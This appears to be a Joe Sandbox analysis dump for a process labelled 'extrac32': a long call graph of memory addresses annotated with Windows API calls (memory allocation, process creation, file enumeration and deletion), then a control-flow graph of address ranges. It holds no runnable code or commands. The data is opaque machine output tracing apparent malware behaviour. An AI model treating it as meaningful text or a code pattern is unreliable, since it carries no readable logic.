30c3f80 LdrLoadDll 80110->80111 80112 30c9e4e 80110->80112 80111->80112 80112->80075 80114 30d47ca 80113->80114 80115 30d5d30 LdrLoadDll 80114->80115 80116 30d47db 80115->80116 80120 5122b00 LdrInitializeThunk 80116->80120 80117 30ca4bd 80117->80078 80117->80080 80119->80084 80120->80117 80121 30cec80 80122 30cec9d 80121->80122 80123 30c3ca0 LdrLoadDll 80122->80123 80124 30cecbb 80123->80124 80125 30d06f0 LdrLoadDll 80124->80125 80142 30ceebc 80124->80142 80126 30cece8 80125->80126 80127 30d06f0 LdrLoadDll 80126->80127 80128 30ced01 80127->80128 80129 30d06f0 LdrLoadDll 80128->80129 80130 30ced1a 80129->80130 80131 30d06f0 LdrLoadDll 80130->80131 80132 30ced36 80131->80132 80133 30d06f0 LdrLoadDll 80132->80133 80134 30ced4f 80133->80134 80135 30d06f0 LdrLoadDll 80134->80135 80136 30ced68 80135->80136 80137 30d06f0 LdrLoadDll 80136->80137 80138 30ced84 80137->80138 80139 30d06f0 LdrLoadDll 80138->80139 80140 30ced9d 80139->80140 80141 30d06f0 LdrLoadDll 80140->80141 80143 30cedb5 80141->80143 80143->80142 80145 30ce840 LdrLoadDll 80143->80145 80145->80143 80146 30d4b80 80147 30d4b9a 80146->80147 80148 30d5d30 LdrLoadDll 80147->80148 80149 30d4bab 80148->80149 80152 5122a10 LdrInitializeThunk 80149->80152 80150 30d4bd6 80152->80150 80153 30d7c80 80154 30d6b40 2 API calls 80153->80154 80155 30d7c95 80154->80155 80158 30c47d0 80161 30c47fa 80158->80161 80159 30c4c68 80161->80159 80184 30cfbf0 80161->80184 80162 30c4899 80162->80159 80188 30c0610 9 API calls 80162->80188 80164 30c4907 80164->80159 80165 30d6b40 2 API calls 80164->80165 80167 30c491f 80165->80167 80166 30c4951 80172 30c4958 80166->80172 80208 30c6d40 80166->80208 80167->80166 80207 30b3840 LdrLoadDll LdrInitializeThunk 80167->80207 80169 30c4991 80169->80159 80215 30d45f0 80169->80215 80172->80159 80189 30d40e0 80172->80189 80174 30c49ee 80198 30d4160 80174->80198 80176 30c4bf7 80180 30c4c1a 80176->80180 80225 30d4260 80176->80225 80177 30c4a0e 80177->80176 80224 30b38b0 LdrLoadDll LdrInitializeThunk 80177->80224 80182 30c4c37 80180->80182 80234 30c6f10 80180->80234 80238 30d5080 LdrLoadDll 80182->80238 80185 30cfc09 80184->80185 80239 30d6ab0 80185->80239 80187 30cfc11 80187->80162 80188->80164 80190 30d40fe 80189->80190 80191 30d4133 80189->80191 80192 30d5d30 LdrLoadDll 80190->80192 80193 30d5d30 LdrLoadDll 80191->80193 80194 30d411b 80192->80194 80195 30d4149 80193->80195 80194->80174 80249 51238d0 LdrInitializeThunk 80195->80249 80196 30d4158 80196->80174 80199 30d4181 80198->80199 80200 30d41b6 80198->80200 80201 30d5d30 LdrLoadDll 80199->80201 80202 30d5d30 LdrLoadDll 80200->80202 80203 30d419e 80201->80203 80204 30d41cc 80202->80204 80203->80177 80250 5124260 LdrInitializeThunk 80204->80250 80205 30d41db 80205->80177 80207->80166 80209 30c6d5d 80208->80209 80251 30d4540 80209->80251 80211 30c6dad 80212 30c6db4 80211->80212 80213 30d45f0 2 API calls 80211->80213 80212->80169 80214 30c6ddd 80213->80214 80214->80169 80216 30d4611 80215->80216 80217 30d4666 80215->80217 80219 30d5d30 LdrLoadDll 80216->80219 80218 30d5d30 LdrLoadDll 80217->80218 80221 30d467c 80218->80221 80220 30d462e 80219->80220 80220->80172 80261 5122c30 LdrInitializeThunk 80221->80261 80222 30d46ab 80222->80172 80224->80176 80226 30d42b6 80225->80226 80227 30d4281 80225->80227 80229 30d5d30 LdrLoadDll 80226->80229 80228 30d5d30 LdrLoadDll 80227->80228 80230 30d429e 80228->80230 80231 30d42cc 80229->80231 80230->80180 80262 5122ed0 LdrInitializeThunk 80231->80262 80232 30d42db 80232->80180 80235 30c6f23 80234->80235 80263 30d4380 80235->80263 80237 30c6f4e 80237->80180 80238->80159 80242 30d4e50 80239->80242 80241 30d6ae1 80241->80187 80243 30d4eb6 80242->80243 80244 30d4e71 80242->80244 80246 30d5d30 LdrLoadDll 80243->80246 80245 30d5d30 LdrLoadDll 80244->80245 80248 30d4e8e 80245->80248 80247 30d4ecc NtAllocateVirtualMemory 80246->80247 80247->80241 80248->80241 80249->80196 80250->80205 80252 30d4561 80251->80252 80253 30d45aa 80251->80253 80254 30d5d30 LdrLoadDll 80252->80254 80255 30d5d30 LdrLoadDll 80253->80255 80257 30d457e 80254->80257 80256 30d45c0 80255->80256 80260 5122e50 LdrInitializeThunk 80256->80260 80257->80211 80258 30d45e3 80258->80211 80260->80258 80261->80222 80262->80232 80264 30d439e 80263->80264 80265 30d43d3 80263->80265 80266 30d5d30 LdrLoadDll 80264->80266 80267 30d5d30 LdrLoadDll 80265->80267 80268 30d43bb 80266->80268 80269 30d43e9 80267->80269 80268->80237 80272 5122cf0 LdrInitializeThunk 80269->80272 80270 30d43f8 80270->80237 80272->80270 80273 30c9a10 80278 30c9740 80273->80278 80275 30c9a1d 80298 30c93e0 80275->80298 80277 30c9a23 80279 30c9765 80278->80279 80280 30c3f80 LdrLoadDll 80279->80280 80281 30c97f5 80280->80281 80282 30c3f80 LdrLoadDll 80281->80282 80283 30c9854 80282->80283 80284 30c7160 2 API calls 80283->80284 80285 30c989b 80284->80285 80286 30c98a2 80285->80286 80287 30d18a0 3 API calls 80285->80287 80286->80275 80289 30c98b0 80287->80289 80288 30c98b9 80288->80275 80289->80288 80290 30c3f80 LdrLoadDll 80289->80290 80291 30c9919 80290->80291 80293 30c99a1 80291->80293 80310 30c8e40 80291->80310 80295 30c99f9 80293->80295 80319 30c91a0 80293->80319 80296 30d6b40 2 API calls 80295->80296 80297 30c9a00 80296->80297 80297->80275 80299 30c93f6 80298->80299 80308 30c9401 80298->80308 80300 30d6c20 2 API calls 80299->80300 80300->80308 80301 30c9417 80301->80277 80302 30c7160 2 API calls 80302->80308 80303 30c970e 80304 30c9727 80303->80304 80305 30d6b40 2 API calls 80303->80305 80304->80277 80305->80304 80306 30c8e40 3 API calls 80306->80308 80307 30c3f80 LdrLoadDll 80307->80308 80308->80301 80308->80302 80308->80303 80308->80306 80308->80307 80309 30c91a0 2 API calls 80308->80309 80309->80308 80311 30c8e66 80310->80311 80312 30cc3a0 2 API calls 80311->80312 80313 30c8ecd 80312->80313 80315 30c9050 80313->80315 80316 30c8eeb 80313->80316 80314 30c9035 80314->80291 80315->80314 80317 30c8d10 3 API calls 80315->80317 80316->80314 80323 30c8d10 80316->80323 80317->80315 80320 30c91c6 80319->80320 80321 30cc3a0 2 API calls 80320->80321 80322 30c9242 80321->80322 80322->80293 80324 30c8d26 80323->80324 80327 30cc8a0 80324->80327 80326 30c8e2e 80326->80316 80328 30cc8dd 80327->80328 80329 30cc98d 80328->80329 80331 30cc930 80328->80331 80334 30cd9a0 80328->80334 80329->80326 80332 30cc969 80331->80332 80333 30d6b40 2 API calls 80331->80333 80332->80326 80333->80332 80336 30cd9b4 80334->80336 80337 30cd6a0 80334->80337 80336->80331 80338 30cd6c6 80337->80338 80340 30d6ab0 2 API calls 80338->80340 80341 30cd6e9 80338->80341 80339 30cd991 80339->80336 80340->80341 80341->80339 80342 30c3f80 LdrLoadDll 80341->80342 80349 30cd7da 80341->80349 80343 30cd856 80342->80343 80344 30c3f80 LdrLoadDll 80343->80344 80344->80349 80345 30cd973 80347 30d6b40 2 API calls 80345->80347 80348 30cd983 80347->80348 80348->80336 80349->80339 80349->80345 80350 30bb130 80349->80350 80351 30bb14b 80350->80351 80352 30d6ab0 2 API calls 80351->80352 80353 30bc7a1 80352->80353 80353->80345 80354 30c6250 80355 30c627e 80354->80355 80356 30c6d40 3 API calls 80355->80356 80357 30c62a6 80356->80357 80358 30c62ad 80357->80358 80361 30d6c60 80357->80361 80360 30c62bd 80362 30d4fe0 2 API calls 80361->80362 80363 30d6c7d 80362->80363 80363->80360 80364 30d0250 80365 30d026c 80364->80365 80376 30d4a10 80365->80376 80368 30d02a8 80371 30d4d20 2 API calls 80368->80371 80369 30d0294 80370 30d4d20 2 API calls 80369->80370 80372 30d029d 80370->80372 80373 30d02b1 80371->80373 80374 30d6c60 2 API calls 80373->80374 80375 30d02bc 80374->80375 80377 30d4a2d 80376->80377 80378 30d5d30 LdrLoadDll 80377->80378 80379 30d028d 80378->80379 80379->80368 80379->80369 80380 30c2a2c 80388 30c6ba0 80380->80388 80382 30c2a6a 80384 30c2a51 80398 30bf4d0 LdrLoadDll 80384->80398 80385 30d4d20 2 API calls 80385->80384 80387 30c2a5b 80389 30c2a3c 80388->80389 80390 30c6bba 80388->80390 80389->80382 80389->80384 80389->80385 80391 30c3f80 LdrLoadDll 80390->80391 80392 30c6bff 80391->80392 80399 30d44a0 80392->80399 80394 30c6c44 80403 30d44f0 80394->80403 80397 30d4d20 2 API calls 80397->80389 80398->80387 80400 30d44ba 80399->80400 80401 30d5d30 LdrLoadDll 80400->80401 80402 30d44cb 80401->80402 80402->80394 80404 30d450d 80403->80404 80405 30d5d30 LdrLoadDll 80404->80405 80406 30d451e 80405->80406 80409 51234e0 LdrInitializeThunk 80406->80409 80407 30c6c8a 80407->80397 80409->80407 80410 51229f0 LdrInitializeThunk 80411 30b98e0 80414 30b9c6c 80411->80414 80413 30ba0eb 80414->80413 80415 30d67d0 80414->80415 80416 30d67f6 80415->80416 80423 30c2bd0 80416->80423 80418 30d6802 80419 30d6830 80418->80419 80426 30d3060 80418->80426 80430 30d5080 LdrLoadDll 80419->80430 80422 30d6841 80422->80413 80425 30c2bdd 80423->80425 80431 30c2b20 80423->80431 80425->80418 80427 30d30ba 80426->80427 80428 30d30c7 80427->80428 80459 30c1ad0 80427->80459 80428->80419 80430->80422 80432 30c2b37 80431->80432 80448 30d1bb0 LdrLoadDll 80431->80448 80438 30d1c10 80432->80438 80435 30c2b43 80437 30c2b50 80435->80437 80441 30d56c0 80435->80441 80437->80425 80439 30d1c2d 80438->80439 80449 30d4f90 LdrLoadDll 80438->80449 80439->80435 80443 30d56d8 80441->80443 80442 30d56fc 80442->80437 80443->80442 80450 30d4450 80443->80450 80446 30d6b40 2 API calls 80447 30d576a 80446->80447 80447->80437 80448->80432 80449->80439 80451 30d446a 80450->80451 80452 30d5d30 LdrLoadDll 80451->80452 80453 30d447b 80452->80453 80456 5122b2a 80453->80456 80454 30d4496 80454->80446 80457 5122b31 80456->80457 80458 5122b3f LdrInitializeThunk 80456->80458 80457->80454 80458->80454 80460 30c1b05 80459->80460 80477 30c6cb0 80460->80477 80462 30c1b0d 80463 30c1d59 80462->80463 80464 30d6c20 2 API calls 80462->80464 80463->80428 80465 30c1b23 80464->80465 80466 30d6c20 2 API calls 80465->80466 80467 30c1b34 80466->80467 80468 30d6c20 2 API calls 80467->80468 80469 30c1b45 80468->80469 80489 30c52f0 80469->80489 80471 30c1ba7 80476 30c1bcf 80471->80476 80519 30c5f00 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 80471->80519 80473 30c1b52 80473->80471 80518 30c5470 LdrLoadDll 80473->80518 80499 30c15d0 80476->80499 80478 30c6cdc 80477->80478 80520 30c4030 80478->80520 80480 30c6cee 80481 30c6ba0 3 API calls 80480->80481 80482 30c6cff 80481->80482 80483 30c6d09 80482->80483 80484 30c6d21 80482->80484 80486 30c6d14 80483->80486 80487 30d4d20 2 API calls 80483->80487 80485 30c6d32 80484->80485 80488 30d4d20 2 API calls 80484->80488 80485->80462 80486->80462 80487->80486 80488->80485 80490 30c5306 80489->80490 80491 30c5310 80489->80491 80490->80473 80492 30c3f80 LdrLoadDll 80491->80492 80493 30c53a9 80492->80493 80494 30c3ec0 LdrLoadDll 80493->80494 80496 30c53bd 80494->80496 80495 30c53e3 80495->80473 80496->80495 80497 30c3f80 LdrLoadDll 80496->80497 80498 30c540a 80497->80498 80498->80473 80524 30c6f70 80499->80524 80501 30c1ab8 80501->80463 80502 30c15ea 80502->80501 80503 30cfbf0 2 API calls 80502->80503 80507 30c1648 80503->80507 80505 30c17ee 80535 30d7d50 80505->80535 80507->80501 80530 30d7c20 80507->80530 80508 30c1803 80512 30c1819 80508->80512 80541 30bfdb0 80508->80541 80509 30bfdb0 4 API calls 80509->80512 80511 30c6f10 2 API calls 80511->80512 80512->80501 80512->80509 80512->80511 80517 30c0070 2 API calls 80512->80517 80513 30c18d0 80513->80512 80554 30c0070 80513->80554 80515 30c1949 80515->80512 80516 30c6f10 LdrLoadDll LdrInitializeThunk 80515->80516 80516->80515 80517->80512 80518->80471 80519->80476 80521 30c4076 80520->80521 80522 30c3ec0 LdrLoadDll 80521->80522 80523 30c4109 80522->80523 80523->80480 80525 30c6f7d 80524->80525 80526 30d06f0 LdrLoadDll 80525->80526 80527 30c6f97 80526->80527 80528 30c6f9e SetErrorMode 80527->80528 80529 30c6fa5 80527->80529 80528->80529 80529->80502 80531 30d7c36 80530->80531 80532 30d7c30 80530->80532 80533 30d6c20 2 API calls 80531->80533 80532->80505 80534 30d7c5c 80533->80534 80534->80505 80536 30d7cc0 80535->80536 80537 30d6c20 2 API calls 80536->80537 80538 30d7d1d 80536->80538 80539 30d7cfa 80537->80539 80538->80508 80540 30d6b40 2 API calls 80539->80540 80540->80538 80542 30bfdbb 80541->80542 80543 30bfdc0 80541->80543 80542->80513 80544 30d6ab0 2 API calls 80543->80544 80547 30bfde5 80544->80547 80545 30bfe4c 80545->80513 80547->80545 80550 30bfe52 80547->80550 80552 30d6ab0 2 API calls 80547->80552 80558 30d4400 80547->80558 80564 30d4f40 80547->80564 80549 30bfe7c 80549->80513 80550->80549 80551 30d4f40 2 API calls 80550->80551 80553 30bfe6d 80551->80553 80552->80547 80553->80513 80555 30c0086 80554->80555 80556 30d4f40 2 API calls 80555->80556 80557 30c0092 80556->80557 80557->80515 80559 30d441a 80558->80559 80560 30d5d30 LdrLoadDll 80559->80560 80561 30d442b 80560->80561 80570 5122d10 LdrInitializeThunk 80561->80570 80562 30d4442 80562->80547 80565 30d4f5d 80564->80565 80566 30d5d30 LdrLoadDll 80565->80566 80567 30d4f6e 80566->80567 80571 5122b90 LdrInitializeThunk 80567->80571 80568 30d4f85 80568->80547 80570->80562 80571->80568 80572 30cbf20 80573 30cbf42 80572->80573 80574 30c3f80 LdrLoadDll 80573->80574 80575 30cc133 80574->80575 80576 30c3f80 LdrLoadDll 80575->80576 80577 30cc158 80576->80577 80578 30c3ec0 LdrLoadDll 80577->80578 80579 30cc16c 80578->80579 80603 30cbde0 80579->80603 80582 30cbde0 6 API calls 80583 30cc1e2 80582->80583 80584 30cbde0 6 API calls 80583->80584 80585 30cc1fa 80584->80585 80586 30cbde0 6 API calls 80585->80586 80587 30cc212 80586->80587 80588 30cbde0 6 API calls 80587->80588 80589 30cc22d 80588->80589 80590 30cbde0 6 API calls 80589->80590 80592 30cc245 80590->80592 80591 30cc25f 80592->80591 80593 30cbde0 6 API calls 80592->80593 80594 30cc293 80593->80594 80595 30cbde0 6 API calls 80594->80595 80596 30cc2d0 80595->80596 80597 30cbde0 6 API calls 80596->80597 80598 30cc30d 80597->80598 80599 30cbde0 6 API calls 80598->80599 80600 30cc34a 80599->80600 80601 30cbde0 6 API calls 80600->80601 80602 30cc387 80601->80602 80604 30cbe09 80603->80604 80605 30d06f0 LdrLoadDll 80604->80605 80606 30cbe49 80605->80606 80607 30d06f0 LdrLoadDll 80606->80607 80608 30cbe67 80607->80608 80609 30d06f0 LdrLoadDll 80608->80609 80611 30cbe89 80609->80611 80610 30cbf0d 80610->80582 80611->80610 80612 30cbeb3 FindFirstFileW 80611->80612 80612->80610 80613 30cbece 80612->80613 80614 30cbef4 FindNextFileW 80613->80614 80617 30cbcf0 6 API calls 80613->80617 80614->80613 80616 30cbf06 FindClose 80614->80616 80616->80610 80617->80613 80618 30ce3a0 80619 30ce404 80618->80619 80620 30c3f80 LdrLoadDll 80619->80620 80621 30ce4f7 80620->80621 80622 30c57a0 3 API calls 80621->80622 80624 30ce52d 80622->80624 80623 30ce534 80624->80623 80625 30c3f80 LdrLoadDll 80624->80625 80626 30ce570 80625->80626 80627 30c58b0 2 API calls 80626->80627 80629 30ce5b0 80627->80629 80628 30ce6d3 80629->80628 80630 30ce6e2 80629->80630 80652 30ce180 80629->80652 80631 30d4d20 2 API calls 80630->80631 80633 30ce6ec 80631->80633 80634 30ce5e5 80634->80630 80635 30ce5f0 80634->80635 80636 30d6c20 2 API calls 80635->80636 80637 30ce619 80636->80637 80638 30ce638 80637->80638 80639 30ce622 80637->80639 80681 30ce070 CoInitialize 80638->80681 80640 30d4d20 2 API calls 80639->80640 80642 30ce62c 80640->80642 80643 30ce646 80683 30d4860 80643->80683 80645 30ce6c2 80646 30d4d20 2 API calls 80645->80646 80647 30ce6cc 80646->80647 80649 30d6b40 2 API calls 80647->80649 80649->80628 80650 30ce664 80650->80645 80651 30d4860 2 API calls 80650->80651 80689 30cdfa0 LdrLoadDll RtlFreeHeap 80650->80689 80651->80650 80653 30ce19c 80652->80653 80654 30c3ca0 LdrLoadDll 80653->80654 80656 30ce1ba 80654->80656 80655 30ce1c3 80655->80634 80656->80655 80657 30d06f0 LdrLoadDll 80656->80657 80658 30ce1e0 80657->80658 80659 30d06f0 LdrLoadDll 80658->80659 80660 30ce1fb 80659->80660 80661 30d06f0 LdrLoadDll 80660->80661 80662 30ce214 80661->80662 80663 30d06f0 LdrLoadDll 80662->80663 80664 30ce230 80663->80664 80665 30d06f0 LdrLoadDll 80664->80665 80666 30ce249 80665->80666 80667 30d06f0 LdrLoadDll 80666->80667 80668 30ce262 80667->80668 80669 30c3ca0 LdrLoadDll 80668->80669 80671 30ce28e 80669->80671 80670 30ce33d 80670->80634 80671->80670 80672 30d06f0 LdrLoadDll 80671->80672 80673 30ce2b3 80672->80673 80674 30c3ca0 LdrLoadDll 80673->80674 80675 30ce2e8 80674->80675 80675->80670 80676 30d06f0 LdrLoadDll 80675->80676 80677 30ce30b 80676->80677 80678 30d06f0 LdrLoadDll 80677->80678 80679 30ce324 80678->80679 80680 30d06f0 LdrLoadDll 80679->80680 80680->80670 80682 30ce0d5 80681->80682 80682->80643 80684 30d487d 80683->80684 80685 30d5d30 LdrLoadDll 80684->80685 80686 30d488e 80685->80686 80690 5122ac0 LdrInitializeThunk 80686->80690 80687 30d48ad 80687->80650 80689->80650 80690->80687 80691 30c04e0 80692 30c04e9 80691->80692 80693 30c3ca0 LdrLoadDll 80692->80693 80694 30c0518 80693->80694 80695 30d06f0 LdrLoadDll 80694->80695 80696 30c052e 80695->80696 80697 30c054c PostThreadMessageW 80696->80697 80698 30c055d 80696->80698 80697->80698 80699 30d05e0 80700 30d05ef 80699->80700 80701 30d0636 80700->80701 80704 30d0677 80700->80704 80706 30d067c 80700->80706 80702 30d6b40 2 API calls 80701->80702 80703 30d0646 80702->80703 80705 30d6b40 2 API calls 80704->80705 80705->80706 80707 30d3a20 80708 30d3a7a 80707->80708 80710 30d3a87 80708->80710 80711 30d1fc0 80708->80711 80712 30d6ab0 2 API calls 80711->80712 80713 30d2001 80711->80713 80712->80713 80714 30c3ca0 LdrLoadDll 80713->80714 80719 30d2106 80713->80719 80715 30d2047 80714->80715 80716 30d06f0 LdrLoadDll 80715->80716 80717 30d206c 80716->80717 80718 30d2080 Sleep 80717->80718 80717->80719 80718->80717 80719->80710 80720 30d4ca0 80721 30d4cc1 80720->80721 80722 30d4cf2 80720->80722 80723 30d5d30 LdrLoadDll 80721->80723 80724 30d5d30 LdrLoadDll 80722->80724 80725 30d4cde 80723->80725 80726 30d4d08 NtDeleteFile 80724->80726 80727 30d42e0 80728 30d42fe 80727->80728 80729 30d433f 80727->80729 80730 30d5d30 LdrLoadDll 80728->80730 80731 30d5d30 LdrLoadDll 80729->80731 80732 30d431b 80730->80732 80733 30d4355 80731->80733 80736 5122e00 LdrInitializeThunk 80733->80736 80734 30d4370 80736->80734 80737 30c86e1 80745 30c86f0 80737->80745 80738 30c86f7 80739 30d06f0 LdrLoadDll 80739->80745 80740 30c87df GetFileAttributesW 80740->80745 80741 30c898a 80742 30c89a3 80741->80742 80743 30d6b40 2 API calls 80741->80743 80743->80742 80744 30c3f80 LdrLoadDll 80744->80745 80745->80738 80745->80739 80745->80740 80745->80741 80745->80744 80746 30cc3a0 2 API calls 80745->80746 80749 30d15d0 LdrLoadDll NtAllocateVirtualMemory RtlFreeHeap 80745->80749 80750 30d1470 LdrLoadDll NtAllocateVirtualMemory RtlFreeHeap 80745->80750 80746->80745 80749->80745 80750->80745 80751 30c20b8 80752 30c20c5 80751->80752 80753 30c57a0 3 API calls 80752->80753 80754 30c20e3 80753->80754 80755 30c4f30 80756 30c6f10 2 API calls 80755->80756 80757 30c4f60 80755->80757 80756->80757 80759 30c4f8c 80757->80759 80760 30c6e90 80757->80760 80768 30d4050 80760->80768 80762 30c6ed4 80763 30c6ef5 80762->80763 80775 30d41e0 80762->80775 80763->80757 80765 30c6ee5 80766 30c6f01 80765->80766 80767 30d4d20 2 API calls 80765->80767 80766->80757 80767->80763 80769 30d4071 80768->80769 80770 30d40ae 80768->80770 80771 30d5d30 LdrLoadDll 80769->80771 80772 30d5d30 LdrLoadDll 80770->80772 80773 30d408e 80771->80773 80774 30d40c4 80772->80774 80773->80762 80774->80762 80776 30d41fe 80775->80776 80777 30d4233 80775->80777 80779 30d5d30 LdrLoadDll 80776->80779 80778 30d5d30 LdrLoadDll 80777->80778 80780 30d4249 80778->80780 80781 30d421b 80779->80781 80784 5124570 LdrInitializeThunk 80780->80784 80781->80765 80782 30d4258 80782->80765 80784->80782 80785 30c65b0 80786 30c65c8 80785->80786 80790 30c6622 80785->80790 80787 30c9c50 LdrLoadDll 80786->80787 80786->80790 80788 30c660c 80787->80788 80788->80790 80791 30c9ee0 80788->80791 80792 30c9f06 80791->80792 80793 30d06f0 LdrLoadDll 80792->80793 80795 30c9f5a 80793->80795 80794 30ca2d3 80794->80790 80795->80794 80836 30d50c0 80795->80836 80797 30c9fab 80798 30ca2bb 80797->80798 80799 30d7d50 3 API calls 80797->80799 80800 30d6b40 2 API calls 80798->80800 80801 30c9fca 80799->80801 80800->80794 80801->80798 80802 30d4450 2 API calls 80801->80802 80805 30ca0d3 80801->80805 80803 30ca051 80802->80803 80803->80805 80807 30ca059 80803->80807 80804 30ca0b9 80809 30d6b40 2 API calls 80804->80809 80805->80798 80806 30ca133 80805->80806 80811 30c4eb0 2 API calls 80805->80811 80815 30ca29a 80806->80815 80816 30ca163 80806->80816 80807->80794 80807->80804 80808 30ca088 80807->80808 80840 30c4eb0 80807->80840 80812 30d4d20 2 API calls 80808->80812 80813 30ca0c9 80809->80813 80811->80806 80814 30ca098 80812->80814 80813->80790 80843 30d2240 LdrLoadDll LdrInitializeThunk 80814->80843 80819 30d6b40 2 API calls 80815->80819 80844 30d4db0 80816->80844 80820 30ca2b1 80819->80820 80820->80790 80821 30ca182 80822 30c6d40 3 API calls 80821->80822 80823 30ca1eb 80822->80823 80823->80798 80824 30ca1f6 80823->80824 80825 30d6b40 2 API calls 80824->80825 80826 30ca21a 80825->80826 80853 30d46b0 80826->80853 80829 30d45f0 2 API calls 80830 30ca255 80829->80830 80831 30ca25c 80830->80831 80832 30d46b0 2 API calls 80830->80832 80831->80790 80833 30ca282 80832->80833 80834 30d4260 2 API calls 80833->80834 80835 30ca290 80834->80835 80835->80790 80837 30d50da 80836->80837 80838 30d5d30 LdrLoadDll 80837->80838 80839 30d50e7 CreateProcessInternalW 80838->80839 80839->80797 80841 30d45f0 2 API calls 80840->80841 80842 30c4eee 80841->80842 80842->80808 80843->80804 80845 30d4dd1 80844->80845 80846 30d4e12 80844->80846 80848 30d5d30 LdrLoadDll 80845->80848 80847 30d5d30 LdrLoadDll 80846->80847 80849 30d4e28 80847->80849 80850 30d4dee 80848->80850 80859 5122da0 LdrInitializeThunk 80849->80859 80850->80821 80851 30d4e43 80851->80821 80854 30d46cd 80853->80854 80855 30d5d30 LdrLoadDll 80854->80855 80856 30d46de 80855->80856 80860 5122c50 LdrInitializeThunk 80856->80860 80857 30ca22e 80857->80829 80859->80851 80860->80857 80861 30c63f0 80862 30c640c 80861->80862 80866 30c64ef 80861->80866 80864 30d4d20 2 API calls 80862->80864 80862->80866 80863 30c6582 80865 30c6427 80864->80865 80875 30c5a30 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 80865->80875 80866->80863 80876 30c5a30 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 80866->80876 80868 30c655f 80868->80863 80877 30c5c00 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 80868->80877 80871 30c645f 80872 30c3f80 LdrLoadDll 80871->80872 80873 30c648c 80872->80873 80874 30c3f80 LdrLoadDll 80873->80874 80874->80866 80875->80871 80876->80868 80877->80863 80878 30cfdb1 80892 30d4be0 80878->80892 80880 30cfdd2 80881 30cfde9 80880->80881 80899 30d49c0 LdrLoadDll 80880->80899 80883 30cfe05 80881->80883 80884 30cfdf0 80881->80884 80886 30d4d20 2 API calls 80883->80886 80885 30d4d20 2 API calls 80884->80885 80887 30cfdf9 80885->80887 80889 30cfe0e 80886->80889 80888 30cfe3a 80889->80888 80890 30d6b40 2 API calls 80889->80890 80891 30cfe2e 80890->80891 80893 30d4c4f 80892->80893 80894 30d4bfe 80892->80894 80895 30d5d30 LdrLoadDll 80893->80895 80896 30d5d30 LdrLoadDll 80894->80896 80897 30d4c65 NtReadFile 80895->80897 80898 30d4c1b 80896->80898 80897->80880 80898->80880 80899->80881 80900 30c4ff1 80901 30d4450 2 API calls 80900->80901 80902 30c4ff6 80901->80902 80903 30d4db0 2 API calls 80902->80903 80904 30c500b 80903->80904 80905 30d4ab0 80906 30d4ad1 80905->80906 80907 30d4b2a 80905->80907 80908 30d5d30 LdrLoadDll 80906->80908 80909 30d5d30 LdrLoadDll 80907->80909 80910 30d4aee 80908->80910 80911 30d4b40 NtCreateFile 80909->80911

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 30 30b98e0-30b9c62 31 30b9c6c-30b9c85 30->31 31->31 32 30b9c87-30b9c98 31->32 33 30b9ca9-30b9cb5 32->33 34 30b9ccb 33->34 35 30b9cb7-30b9cc9 33->35 37 30b9cd2-30b9cd9 34->37 35->33 38 30b9d0b-30b9d1c 37->38 39 30b9cdb-30b9d09 37->39 40 30b9d2d-30b9d36 38->40 39->37 41 30b9d38-30b9d44 40->41 42 30b9d54-30b9d5b 40->42 43 30b9d52 41->43 44 30b9d46-30b9d4c 41->44 45 30b9d5d-30b9d80 42->45 46 30b9d82-30b9d8c 42->46 43->40 44->43 45->42 48 30b9d8e-30b9dad 46->48 49 30b9dc0-30b9dc9 46->49 50 30b9daf-30b9db8 48->50 51 30b9dbe 48->51 52 30b9dcf-30b9dd2 49->52 53 30ba055-30ba061 49->53 50->51 51->46 56 30b9dd8-30b9ddf 52->56 54 30ba063-30ba07e 53->54 55 30ba080-30ba099 53->55 54->53 55->55 57 30ba09b-30ba0a2 55->57 58 30b9de1-30b9e04 56->58 59 30b9e06-30b9e10 56->59 61 30ba0a8-30ba0b2 57->61 62 30ba170-30ba17a 57->62 58->56 60 30b9e21-30b9e2d 59->60 63 30b9e2f-30b9e42 60->63 64 30b9e44-30b9e53 60->64 65 30ba0e6 call 30d67d0 61->65 66 30ba0b4-30ba0d3 61->66 67 30ba1ae-30ba1b7 62->67 68 30ba17c-30ba19b 62->68 63->60 72 30b9e79-30b9e7d 64->72 73 30b9e55-30b9e59 64->73 77 30ba0eb-30ba0f5 65->77 75 30ba0d5-30ba0de 66->75 76 30ba0e4 66->76 70 30ba19d-30ba1a6 68->70 71 30ba1ac 68->71 70->71 71->62 80 30b9e98-30b9ea2 72->80 81 30b9e7f-30b9e96 72->81 78 30b9e5b-30b9e72 73->78 79 30b9e74 73->79 75->76 76->61 82 30ba106-30ba112 77->82 78->73 79->53 83 30b9eb3-30b9ebf 80->83 81->72 84 30ba122-30ba12c 82->84 85 30ba114-30ba120 82->85 86 30b9ecf-30b9ed6 83->86 87 30b9ec1-30b9ecd 83->87 88 30ba13d-30ba149 84->88 85->82 90 30b9f08-30b9f12 86->90 91 30b9ed8-30b9f06 86->91 87->83 88->62 94 30ba14b-30ba154 88->94 93 30b9f23-30b9f2f 90->93 91->86 95 30b9f31-30b9f3a 93->95 96 30b9f47-30b9f51 93->96 97 30ba15b-30ba15d 94->97 98 30ba156-30ba15a 94->98 99 30b9f3c-30b9f3f 95->99 100 30b9f45 95->100 101 30b9f62-30b9f6b 96->101 102 30ba15f-30ba168 97->102 103 30ba16e 97->103 98->97 99->100 100->93 105 30b9f6d-30b9f80 101->105 106 30b9f82-30b9f88 101->106 102->103 103->88 105->101 108 30b9f8c-30b9f93 106->108 110 30b9f95-30b9fb2 108->110 111 30b9fb4-30b9fbb 108->111 110->108 112 30b9fbd-30b9fe0 111->112 113 30b9fe2-30b9fec 111->113 112->111 114 30b9ffd-30ba009 113->114 115 30ba00b-30ba014 114->115 116 30ba016-30ba020 114->116 115->114 118 30ba031-30ba03a 116->118 119 30ba03c-30ba04e 118->119 120 30ba050 118->120 119->118 120->49
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.16758650959.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_30b0000_extrac32.jbxd
                                                                                                                                                                                                  Yara matches
